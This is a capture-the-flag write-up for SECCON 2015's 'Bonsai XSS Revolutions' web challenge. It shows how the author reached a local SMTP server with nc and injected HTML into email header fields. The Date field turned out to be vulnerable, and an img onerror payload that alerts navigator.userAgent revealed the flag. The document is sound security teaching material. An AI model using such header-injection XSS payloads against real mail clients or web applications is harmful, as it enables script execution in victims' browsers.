SECCON CTF 2015 – Bonsai XSS Revolutions (Web) – Write-up

Bonsai XSS Revolutions

Category: Web Points: 200 Solves: 49

Description :

What is your browser (User-Agent) ?
hakoniwaWebMail_20151124.zip
Requirement:.NET Framework 4.5

 

The binary provided is a .NET executable, it looks like a fake Windows OS.

Initially, the application starts a fake web browser and connects to a mailbox. Then, it displays new emails one by one.

xss_bonsai

 

First, we notice that we cannot directly interact with the application. So, let’s find a way to send emails to keigo.yamazaki@tsuribori.test.

A quick netstat test reveals that TCP port 25 is listening (SMTP) :

C:\WINDOWS\system32>netstat -onab
Connexions actives
 Proto   Adresse locale   Adresse distante   État
 TCP     127.0.0.1:25     0.0.0.0:0          LISTENING
 [hakoniwaWebMail.exe]

Let’s try to connect :

$ nc localhost 25
220 tsuribori.test Tsuribori-SMTPserver by KeigoYAMAZAKI, 2014.12.09- ESMTP

Good ! An SMTP server as expected !

Since the challenge name is related to XSS, we tried to send a HTML email, but the HTML content is not displayed…

Maybe we can inject HTML in header fields :

HELO tsuribori.test
MAIL FROM: admin@gayluchat.org
RCPT TO: keigo.yamazaki@tsuribori.test
DATA
From: Me<img src=0>
To: You<img src=0>
Date: Today<img src=0>
Subject: Test Message<img src=0>

This is a text message !
.

Which gives us:

xss_mail

 

We find the vulnerable field : Date. And since the flag is the navigator User-Agent, we can use this payload to display it :

<img src=0 onerror=alert(navigator.userAgent)>

flag_xss

Leave a Comment

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *